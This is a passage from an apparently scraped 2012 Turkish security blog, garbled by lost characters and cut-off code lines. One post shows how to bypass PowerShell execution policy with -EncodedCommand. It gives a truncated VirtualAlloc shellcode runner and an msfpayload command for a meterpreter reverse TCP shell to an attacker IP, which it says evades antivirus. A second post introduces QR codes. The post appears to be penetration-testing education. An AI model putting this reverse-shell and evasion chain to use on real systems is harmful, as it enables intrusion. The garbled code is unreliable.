Hack 4 Career - 2012Komut Satırının Gücü Adına!

Hack 4 Career - 2012

Komut Satirinin G?c? Adina!

Source: By M.S on December 5th, 2012

Yapilan istatistiklere g?re 2011 yilinin son ?eyreinde Windows XP iletim sistemi ile Windows 7 iletim sistemi arasindaki kullanim oranlari birbirine olduk?a yakinken, 2012 yilinin son ?eyreinde Windows 7 iletim sistemi kullanim oraninin Windows XP iletim sistemi kullanim oranini ikiye katlami olmasi, penetrasyon testi/sizma testi ger?ekletiren biliim g?venlii uzmanlari arasinda tek bir nedenden ?t?r? memnuniyetle karilandi o da Windows 7 ile y?kl? gelen Powershell'den bakasi deildi. Powershell, Mircosoft tarafindan y?netim g?revlerini otomatize etmek amaciyla gelitirilmi, .NET siniflarindan faydalanarak betikler (script) gelitirilmesine imkan taniyan yeni nesil komut satiridir. lk s?r?m? 2006 yilinda Microsoft tarafindan yayinlanan Powershell'in ikinci s?r?m? 2009 yilinda Windows 7 ve Windows 2008 iletim sistemlerine entegre edilmi ???nc? s?r?m? ise Windows 8 ve Windows Server 2012 iletim sistemlerine entegre edilerek kullanicilarin kullanimina sunulmutur. Powershell, g?venlik ?nlemi adina g?venilir kaynaklar tarafindan gelitirilmemi olan betiklerin ?alitirilmasina varsayilan (default) olarak izin vermez. Kurumsal ortamlarda da daha ?nce Powershell'in g?c?ne taniklik etmi olan Sistem Y?neticileri ?ounlukla Etki Alani Denetleyicisi (DC) ?zerinden Powershell'in g?venilir olmayan kaynaklardan indirilen betiklerin ?alitirilmasini yasaklamaktadirlar.

Ancak ve ancak sistem y?neticileri de dahil ?ou son kullanici bu betiklerin Command ve EncodedCommand (Base64 ile kodlanmi (encode) betik) ile de ?alitirildiindan haberdar deildir. Normal artlarda betik ?alitirmaya izin vermeyen politikalar Command ve EncodedCommand ile atlatilabilmektedir.

1

Powershell'in betiklerde .NET siniflarini kullanmaya imkan tanimasi, C# ile yazilmi bir kod par?asini ?alitirma (runtime) esnasinda derlemesi ve ?alitirmasi sayesinde ?rnein komut enjeksiyonu (command injection) zafiyeti olan bir Windows Server 2008 iletim sisteminin komut satirina uzaktan erimek (remote shell) veya basit ifre tahmini ile sizilan bir Windows 7 iletim sisteminin Metasploit'e balanmasini salamak m?mk?nd?r. En ?nemlisi ise Powershell sayesinde Antivir?s yaziliminin kullanildii bir sistemde Antivir?s'e yakalanmadan istenilen kabuk kodu ?alitirabilmektedir. ?rnek olarak Powershell ?zerinden kabuk kodu ?alitirmak i?in Matt Graeber tarafindan gelitirilen aaidaki betii kullanabilirsiniz.

$code = {$code = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSiz

Betiin ?aliabilmesi i?in $sc64 deikenine hedef ilemci mimarisine uygun olan (x32 veya x64) kabuk kodunu kopyalamaniz gerekmektedir. $sc64 deikenine atanacak kabuk kodunu aaidaki ekilde oluturabilirsiniz.

msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.159.128 PORT=4444 EXITFUNC=thread C | sed '1,6d;s/[";

Ardindan betik blounu Powershell komut satirina kopyaladiktan sonra Base64 ile kodlamak i?in [convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($code)) kodunu ?alitirmaniz gerekmektedir. Son olarak Backtrack'de hazir bulunan Meterpreter ile hedef sistemi balamak i?in az ?nce elde ettiiniz BASE64 ile kodlanmi betii hedef sistemde powershell -EncodedCommand eklinde ?alitirarak Meterpreter'in Antivir?s y?kl? hedef sistemde baariyla ?alimasini salayabilirsiniz.

2

Sonu? olarak Powershell ?st?n ?zelliklerinin yani sira mevcut g?venlik kontrollerinin yetersiz olmasi nedeniyle k?t?ye kullanima a?ik olduu i?in kullanimina ihtiya? duyulmayan sistemlerden kaldirilmasini tavsiye ederim. Bir sonraki yazida g?r?mek dileiyle herkese g?venli g?nler dilerim.

?abuk Tepki Vermeyin

Source: By M.S on October 31st, 2012

Quick Response Code (QR Code) T?rk?e meali ile ?abuk Tepki Kodu, 1994 yilinda Toyota'nin itiraki olan Japon Denso firmasi tarafindan ?retim bandinda par?a takibi amaciyla gelitirilmi iki boyutlu barkod t?r?d?r. QR Kodunun veri kapasitesi, n?merik olarak en fazla 7.089 karakter, alfan?merik olarak en fazla 4.291 karakter, ikilik sistem (8 Bit) olarak en fazla 2.953 bayt, Kanji/Kana olarak ise en fazla 1.817 karakterdir. (Veri kapasitesi se?ilen s?r?me ve hata d?zeltimine g?re deiiklik g?sterebilir.) G?n?m?zde hemen hemen her akilli cihazda (cep telefonlari, tabletler vb.) barkod okuyucu uygulamasi olmasi nedeniyle barkodlar, bata reklam sekt?r? olmak ?zere hizmet sekt?r?, gida sekt?r?, yazilim sekt?r? ve bankacilik sekt?r? gibi bir?ok sekt?r tarafindan ?eitli ama?lar (web sitesi reklami, uygulama indirme, sanal aliveri vs.) i?in kullanilmaktadir. ?rnein bundan 7 ay ?nce Astoria Aliveri Merkezinde karilatiim devasa QR koduna bakacak olursaniz Mekanist mobil uygulamasini y?kletmek amaciyla kullanildiini g?rebilirsiniz.

3

4

Bir dier ?rnek olarak ise farkli hizmetler sunmak ve d?nyada bir ilk olmak i?in birbirleriyle yarian risk itahlari y?ksek bankalarimizin ?eitli y?ntemler ile (salla yolla, sosyal adan bankacilik) ger?ekletirdikleri bankacilik ilemlerini benimsemeye ?aliirken dier bir bankamizin ATM'den QR kod ile kredi kartsiz para ?ekmeye imkan taniyarak d?nyada bir ilke imza attiini g?rebilirsiniz.

5

 ................
................

In order to avoid copyright disputes, this page is only a partial summary.

Google Online Preview   Download